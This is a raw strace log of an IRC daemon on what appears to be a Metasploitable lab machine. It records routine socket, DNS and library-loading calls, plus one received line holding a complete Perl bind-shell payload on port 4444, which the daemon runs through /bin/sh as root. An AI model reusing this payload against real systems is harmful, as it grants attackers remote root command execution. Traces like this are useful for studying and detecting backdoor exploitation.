4519  07:30:49.569353 select(1024, [2 3 4 7 9], [], NULL, {0, 470000}) = 1 (in [4], left {0, 380000})

4519  07:30:49.651500 clock_gettime(CLOCK_MONOTONIC, {2259, 468521483}) = 0

4519  07:30:49.651523 recv(4, "PRIVMSG  #testit ABCDEFGHIJKLMNOPQRSTUVWXYZ\n", 8192, 0) = 44

4519  07:30:49.651552 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:49.651571 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:49.651586 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:49.651600 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:49.651614 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:49.651628 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:49.651641 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:49.651655 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:49.651669 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:49.651682 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:49.651696 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:49.651709 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:49.651723 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:49.651736 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:49.651750 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:49.651763 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:49.651777 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:49.651790 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:49.651804 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:49.651818 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:49.651831 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:49.651845 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:49.651861 gettimeofday({1495625449, 651895}, NULL) = 0

4519  07:30:49.651904 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [2], left {0, 940000})

4519  07:30:49.714268 clock_gettime(CLOCK_MONOTONIC, {2259, 531292495}) = 0

4519  07:30:49.714295 time(NULL)        = 1495625449

4519  07:30:49.714309 time(NULL)        = 1495625449

4519  07:30:49.714326 gettimeofday({1495625449, 714332}, NULL) = 0

4519  07:30:49.714344 select(1024, [2], [], NULL, {0, 0}) = 1 (in [2], left {0, 0})

4519  07:30:49.714419 clock_gettime(CLOCK_MONOTONIC, {2259, 531436137}) = 0

4519  07:30:49.714438 gettimeofday({1495625449, 714444}, NULL) = 0

4519  07:30:49.714455 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [2], left {1, 0})

4519  07:30:49.714514 clock_gettime(CLOCK_MONOTONIC, {2259, 531529253}) = 0

4519  07:30:49.714531 accept(2, 0, NULL) = 5

4519  07:30:49.714558 getpeername(5, {sa_family=AF_INET, sin_port=htons(38511), sin_addr=inet_addr("10.0.2.4")}, [16]) = 0

4519  07:30:49.714602 fcntl64(5, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:30:49.714621 fcntl64(5, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:30:49.714640 setsockopt(5, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0

4519  07:30:49.714658 setsockopt(5, SOL_SOCKET, SO_RCVBUF, [8192], 4) = 0

4519  07:30:49.714676 setsockopt(5, SOL_SOCKET, SO_SNDBUF, [8192], 4) = 0

4519  07:30:49.714694 getsockopt(5, SOL_IP, IP_OPTIONS, "", [0]) = 0

4519  07:30:49.714712 setsockopt(5, SOL_IP, IP_OPTIONS, NULL, 0) = 0

4519  07:30:49.714791 clock_gettime(CLOCK_MONOTONIC, {2259, 531825725}) = 0

4519  07:30:49.714825 socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 6

4519  07:30:49.714917 fcntl64(6, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:30:49.714938 fcntl64(6, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:30:49.714948 fcntl64(6, F_SETFD, FD_CLOEXEC) = 0

4519  07:30:49.714960 connect(6, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, 16) = 0

4519  07:30:49.714990 send(6, "\207\266\1\0\0\1\0\0\0\0\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1", 39, MSG_NOSIGNAL) = 39

4519  07:30:49.715040 accept(2, 0, NULL) = -1 EAGAIN (Resource temporarily unavailable)

4519  07:30:49.715082 gettimeofday({1495625449, 715086}, NULL) = 0

4519  07:30:49.715108 select(1024, [2 3 4 6 7 9], [], NULL, {1, 0}) = 1 (in [6], left {1, 0})

4519  07:30:49.720844 clock_gettime(CLOCK_MONOTONIC, {2259, 537861085}) = 0

4519  07:30:49.720861 recvfrom(6, "\207\266\201\203\0\1\0\0\0\1\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1\300\22\0\6\0\1\0\0\0x\0A\10prisoner\4iana\3org\0\nhostmaster\froot-servers\300AwsD\225\0\0\7\10\0\0\3\204\0\t:\200\0\t:\200", 513, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, [16]) = 116

4519  07:30:49.720902 close(6)          = 0

4519  07:30:49.720917 recvfrom(-1, 0xbfbaddf7, 513, 0, 0xbfbadff8, 0xbfbaddf0) = -1 EBADF (Bad file descriptor)

4519  07:30:49.720932 send(5, ":irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...\r\n:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn\'t resolve your hostname; using your IP address instead\r\n", 174, 0) = 174

4519  07:30:49.720988 time(NULL)        = 1495625449

4519  07:30:49.721000 time(NULL)        = 1495625449

4519  07:30:49.721012 gettimeofday({1495625449, 721016}, NULL) = 0

4519  07:30:49.721024 select(1024, [2], [], NULL, {0, 0}) = 0 (Timeout)

4519  07:30:49.721053 clock_gettime(CLOCK_MONOTONIC, {2259, 538065803}) = 0

4519  07:30:49.721064 gettimeofday({1495625449, 721067}, NULL) = 0

4519  07:30:49.721074 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [9], left {0, 810000})

4519  07:30:49.901558 clock_gettime(CLOCK_MONOTONIC, {2259, 718578858}) = 0

4519  07:30:49.901580 recv(9, "PRIVMSG  #testit3 Hiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii\n", 8192, 0) = 55

4519  07:30:49.901605 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:49.901625 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:49.901642 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:49.901656 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:49.901670 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:49.901684 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:49.901698 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:49.901711 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:49.901725 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:49.901739 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:49.901752 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:49.901766 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:49.901779 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:49.901793 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:49.901806 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:49.901820 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:49.901833 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:49.901847 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:49.901861 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:49.901875 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:49.901888 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:49.901909 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:49.901959 gettimeofday({1495625449, 901964}, NULL) = 0

4519  07:30:49.901986 select(1024, [2 3 4 5 7 9], [], NULL, {1, 0}) = 1 (in [5], left {1, 0})

4519  07:30:49.902028 clock_gettime(CLOCK_MONOTONIC, {2259, 719041440}) = 0

4519  07:30:49.902040 recv(5, "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n", 8192, 0) = 244

4519  07:30:49.902069 rt_sigaction(SIGINT, {SIG_IGN}, {0x8062280, [HUP INT], 0}, 8) = 0

4519  07:30:49.902090 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

4519  07:30:49.902103 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

4519  07:30:49.902118 clone(child_stack=0, flags=CLONE_PARENT_SETTID|SIGCHLD, parent_tidptr=0xbfbae034) = 9987

9987  07:30:49.902190 rt_sigaction(SIGINT, {0x8062280, [HUP INT], 0}, NULL, 8) = 0

9987  07:30:49.902205 rt_sigaction(SIGQUIT, {SIG_IGN}, NULL, 8) = 0

9987  07:30:49.902215 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

9987  07:30:49.902229 execve("/bin/sh", ["sh", "-c", "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n"], [/* 14 vars */]) = 0

9987  07:30:49.902335 brk(0)            = 0x80f9000

9987  07:30:49.902357 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

9987  07:30:49.902374 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f7b000

9987  07:30:49.902391 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

9987  07:30:49.902408 open("/etc/ld.so.cache", O_RDONLY) = 1

9987  07:30:49.902451 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

9987  07:30:49.902486 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f73000

9987  07:30:49.902496 close(1)          = 0

9987  07:30:49.902507 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

9987  07:30:49.902523 open("/lib/libncurses.so.5", O_RDONLY) = 1

9987  07:30:49.902536 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\200\220\0\0004\0\0\0h\344\2\0\0\0\0\0004\0 \0\4\0(\0\32\0\31\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0T\305\2\0T\305\2\0\5\0\0\0\0\20\0\0\1\0\0\0T\305\2\0T\325\2\0T\325\2\0004\36\0\0 \"\0\0\6\0\0\0\0\20\0\0\2\0\0\0\34\335\2\0\34\355\2\0\34\355\2\0\330\0\0\0\330\0\0\0\6\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0\t\2\0\0&\2\0\0z\1\0\0L\0\0\0\0\0\0\0\0\0\0\0\25\0\0\0\333\1\0\0\0\0\0\0\0\0\0\0\t\2\0\0\20\2\0\0E\1\0\0\0\0\0\0\0\0\0\0T\0\0\0\367\1\0\0\0\0\0\0\0\0\0\0\306\1\0\0L\1\0\0\203\0\0\0\236\1\0\0\0\0\0\0\0\0\0\0\320\0\0\0005\0\0\0\233\1\0\0\375\0\0\0\265\0\0\0\0\0\0\0\267\0\0\0\0\0\0\0\246\1\0\0\33\1\0\0\300\1\0\0\356\0\0\0\223\0\0\0@\1\0\0\365\1\0\0\23\2\0\0O\0\0\0\303\1\0\0\0\0\0\0\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\225\0\0\0|\0\0\0\0\0\0\0x\0\0\0\364\1\0\0\0\0\0\0\21\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0^\1\0\0\0\0\0\0\22\2\0\0\0\0\0\0\371\0\0\0\33\0\0\0f\0\0\0\37\1\0\0\222\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\354\0\0\0\261\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\36\2\0\0\0\0\0\0\5\0\0\0\364\0\0\0\0\0\0\0R\0\0\0", 512) = 512

9987  07:30:49.902631 fstat64(1, {st_mode=S_IFREG|0644, st_size=190584, ...}) = 0

9987  07:30:49.902649 mmap2(NULL, 194420, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f43000

9987  07:30:49.902661 mmap2(0xb7f70000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x2c) = 0xb7f70000

9987  07:30:49.902678 close(1)          = 0

9987  07:30:49.902690 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

9987  07:30:49.902704 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

9987  07:30:49.902718 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

9987  07:30:49.902812 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

9987  07:30:49.902830 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f3f000

9987  07:30:49.902841 mmap2(0xb7f41000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7f41000

9987  07:30:49.902857 close(1)          = 0

9987  07:30:49.902868 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

9987  07:30:49.902882 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

9987  07:30:49.902896 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

9987  07:30:49.903027 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

9987  07:30:49.903044 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f3e000

9987  07:30:49.903058 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7def000

9987  07:30:49.903069 mmap2(0xb7f38000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7f38000

9987  07:30:49.903084 mmap2(0xb7f3b000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f3b000

9987  07:30:49.903099 close(1)          = 0

9987  07:30:49.903121 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7dee000

9987  07:30:49.903133 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7dee6b0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

9987  07:30:49.903190 mprotect(0xb7f38000, 4096, PROT_READ) = 0

9987  07:30:49.903227 munmap(0xb7f73000, 29913) = 0

9987  07:30:49.903254 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

9987  07:30:49.903269 open("/dev/tty", O_RDWR|O_NONBLOCK|O_LARGEFILE) = -1 ENXIO (No such device or address)

9987  07:30:49.903289 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbff73930) = -1 ENOTTY (Inappropriate ioctl for device)

9987  07:30:49.903332 brk(0)            = 0x80f9000

9987  07:30:49.903341 brk(0x80fa000)    = 0x80fa000

9987  07:30:49.903354 brk(0x80fb000)    = 0x80fb000

9987  07:30:49.903370 getuid32()        = 0

9987  07:30:49.903380 getgid32()        = 0

9987  07:30:49.903389 geteuid32()       = 0

9987  07:30:49.903398 getegid32()       = 0

9987  07:30:49.903439 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

9987  07:30:49.903455 time(NULL)        = 1495625449

9987  07:30:49.903482 brk(0x80fc000)    = 0x80fc000

9987  07:30:49.903497 brk(0x80fd000)    = 0x80fd000

9987  07:30:49.903517 open("/proc/meminfo", O_RDONLY) = 1

9987  07:30:49.903540 fstat64(1, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0

9987  07:30:49.903559 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f7a000

9987  07:30:49.903570 read(1, "MemTotal:      1035240 kB\nMemFree:        437340 kB\nBuffers:         74968 kB\nCached:         363912 kB\nSwapCached:          0 kB\nActive:         256088 kB\nInactive:       311716 kB\nHighTotal:      131008 kB\nHighFree:          240 kB\nLowTotal:       904232 kB\nLowFree:        437100 kB\nSwapTotal:           0 kB\nSwapFree:            0 kB\nDirty:            4156 kB\nWriteback:           0 kB\nAnonPages:      128988 kB\nMapped:          52008 kB\nSlab:            18792 kB\nSReclaimable:    10284 kB\nSUnreclaim:       8508 kB\nPageTables:       1972 kB\nNFS_Unstable:        0 kB\nBounce:              0 kB\nCommitLimit:    517620 kB\nCommitted_AS:   635396 kB\nVmallocTotal:   118776 kB\nVmallocUsed:      3420 kB\nVmallocChunk:   114760 kB\nHugePages_Total:     0\nHugePages_Free:      0\nHugePages_Rsvd:      0\nHugePages_Surp:      0\nHugepagesize:     2048 kB\n", 1024) = 846

9987  07:30:49.903656 close(1)          = 0

9987  07:30:49.903668 munmap(0xb7f7a000, 4096) = 0

9987  07:30:49.903680 brk(0x80fe000)    = 0x80fe000

9987  07:30:49.903706 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

9987  07:30:49.903720 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

9987  07:30:49.903732 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

9987  07:30:49.903744 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

9987  07:30:49.903756 rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_IGN}, 8) = 0

9987  07:30:49.903768 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_DFL}, 8) = 0

9987  07:30:49.903781 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

9987  07:30:49.903793 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

9987  07:30:49.903806 uname({sys="Linux", node="metasploitable", ...}) = 0

9987  07:30:49.903854 stat64("/", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0

9987  07:30:49.903872 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

9987  07:30:49.903890 brk(0x8100000)    = 0x8100000

9987  07:30:49.903908 getcwd("/etc/unreal", 4096) = 12

9987  07:30:49.903930 getpid()          = 9987

9987  07:30:49.903947 getppid()         = 4519

9987  07:30:49.903963 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

9987  07:30:49.903983 stat64("/sbin/sh", 0xbff73908) = -1 ENOENT (No such file or directory)

9987  07:30:49.903995 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

9987  07:30:49.904014 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

9987  07:30:49.904038 socket(PF_FILE, SOCK_STREAM, 0) = 1

9987  07:30:49.904052 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

9987  07:30:49.904064 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

9987  07:30:49.904086 close(1)          = 0

9987  07:30:49.904098 socket(PF_FILE, SOCK_STREAM, 0) = 1

9987  07:30:49.904108 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

9987  07:30:49.904118 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

9987  07:30:49.904136 close(1)          = 0

9987  07:30:49.904151 open("/etc/nsswitch.conf", O_RDONLY) = 1

9987  07:30:49.904165 fstat64(1, {st_mode=S_IFREG|0644, st_size=475, ...}) = 0

9987  07:30:49.904182 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f7a000

9987  07:30:49.904197 read(1, "# /etc/nsswitch.conf\n#\n# Example configuration of GNU Name Service Switch functionality.\n# If you have the `glibc-doc-reference\' and `info\' packages installed, try:\n# `info libc \"Name Service Switch\"\' for information about this file.\n\npasswd:         compat\ngroup:          compat\nshadow:         compat\n\nhosts:          files dns\nnetworks:       files\n\nprotocols:      db files\nservices:       db files\nethers:         db files\nrpc:            db files\n\nnetgroup:       nis\n", 4096) = 475

9987  07:30:49.904247 read(1, "", 4096) = 0

9987  07:30:49.904256 close(1)          = 0

9987  07:30:49.904266 munmap(0xb7f7a000, 4096) = 0

9987  07:30:49.904282 open("/etc/ld.so.cache", O_RDONLY) = 1

9987  07:30:49.904295 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

9987  07:30:49.904311 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f73000

9987  07:30:49.904322 close(1)          = 0

9987  07:30:49.904332 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

9987  07:30:49.904347 open("/lib/tls/i686/cmov/libnss_compat.so.2", O_RDONLY) = 1

9987  07:30:49.904362 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@\16\0\0004\0\0\0\204r\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0001a\0\0001a\0\0001a\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\274c\0\0\274c\0\0\5\0\0\0\0\20\0\0\1\0\0\0\340n\0\0\340~\0\0\340~\0\0\250\2\0\0h\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\364n\0\0\364~\0\0\364~\0\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 